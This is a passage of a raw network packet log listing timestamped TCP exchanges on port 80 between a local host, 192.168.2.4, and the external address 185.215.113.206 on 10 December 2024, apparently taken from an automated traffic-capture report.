Dec 10, 2024 00:42:18.432988882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:19.254358053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:19.254421949 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:20.108181953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:20.227412939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.031569958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.031632900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.264900923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.385838985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701158047 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701236010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701245070 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701334953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.701396942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701407909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701416969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701426029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.701457024 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.701472998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.709673882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.709739923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.709789038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.709856987 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.718141079 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.718235016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.719089985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.726564884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.726629972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.835259914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.835336924 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.835458040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.892983913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.893048048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.893081903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.893162012 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.895467997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.895622969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.896815062 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.904000044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.904010057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.904179096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.912396908 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.912450075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.912513018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.912560940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.920877934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.920934916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.920955896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.921022892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.929270983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.929327011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.929397106 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.931193113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.937721968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.937776089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.937832117 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.937871933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.946171045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.946228981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.946259022 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.946474075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.954709053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.954751015 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.954770088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.954796076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.963155985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.963258028 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.963304996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.971563101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.971671104 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.971721888 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:21.980006933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:21.980058908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.015674114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.015791893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.015796900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.015824080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.019880056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.019942045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.085110903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.085151911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.085251093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.088876963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.088928938 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.088932991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.088990927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.096440077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.096556902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.097354889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.103905916 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.104087114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.106755018 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.111504078 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.111558914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.111664057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.111807108 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.118643999 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.118705034 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.118838072 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.118896008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.123060942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.123070955 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.123296022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.127474070 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.127532005 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.127619982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.127672911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.131890059 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.131947994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.132013083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.132069111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.136344910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.136404037 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.136703014 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.136754990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.140836000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.140887022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.141071081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.141206026 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.145289898 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.145345926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.145469904 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.145690918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.149007082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.149060011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.149075985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.149159908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.152622938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.152694941 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.153218985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.153276920 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.156347990 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.156389952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.156959057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.157155991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.160068989 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.160079956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.160141945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.160170078 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.163738012 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.163794994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.163943052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.163989067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.167498112 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.167552948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.167594910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.167797089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.171169043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.171202898 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.171260118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.174865007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.174937963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.175008059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.178549051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.178611994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.179490089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.182286024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.182334900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.183931112 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.183981895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.208187103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.208245039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.208471060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.209002972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.210041046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.210094929 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.210144997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.210187912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.213715076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.213784933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.277124882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.277184963 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.277448893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.277544975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.278698921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.278748989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.278800964 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.278861046 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.281141043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.281188011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.281243086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.281300068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.284392118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.284437895 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.284440994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.284564972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.287566900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.287664890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.287813902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.290673971 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.290730953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.290802002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.290849924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.293616056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.293684959 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.293711901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.293768883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.296443939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.296490908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.296545029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.296601057 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.299264908 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.299309969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.299823046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.299877882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.302042007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.302090883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.302259922 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.302309036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.304775953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.304825068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.304958105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.305043936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.307454109 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.307511091 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.308078051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.308130026 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.310158968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.310204029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.310256004 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.310312033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.312736034 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.312793016 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.312812090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.312915087 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.315356970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.315367937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.315412998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.317914963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.317964077 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.318128109 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.318281889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.320533991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.320583105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.320676088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.320720911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.323183060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.323230982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.323256969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.323365927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.325778008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.325819969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.325830936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.325952053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.328402042 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.328468084 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.328840971 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.328891993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.330985069 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.331036091 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.331516981 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.331566095 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.333606958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.333657980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.333682060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.333730936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.335561991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.335611105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.335815907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.335858107 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.337433100 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.337568998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.337884903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.337925911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.339338064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.339385986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.339828968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.339874029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.341218948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.341269016 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.341311932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.341362953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.343080997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.343156099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.343159914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.343235016 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.345041037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.345052004 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.345091105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.346844912 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.346894979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.347111940 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.347167015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.348753929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.348807096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.348871946 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.348916054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.350660086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.350708008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.351300955 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.351352930 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.352528095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.352576017 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.352880001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.353023052 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.354435921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.354480982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.354657888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.354705095 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.356297970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.356348991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.356375933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.356417894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.358186960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.358241081 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.358360052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.358407021 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.360054016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.360102892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.360110998 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.360150099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.361907959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.361953020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.399791002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.399848938 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.399903059 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.399943113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.400732994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.400782108 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.400930882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.400978088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.405611038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.405623913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.405637026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.405649900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.405860901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.405860901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.406367064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.406419039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.406685114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.406738997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.469158888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.469322920 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.469331026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.469377995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.469969988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.470025063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.470170021 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:22.470236063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:22.471594095 CET	80	49749	185.215.113.206	192.168.2.4
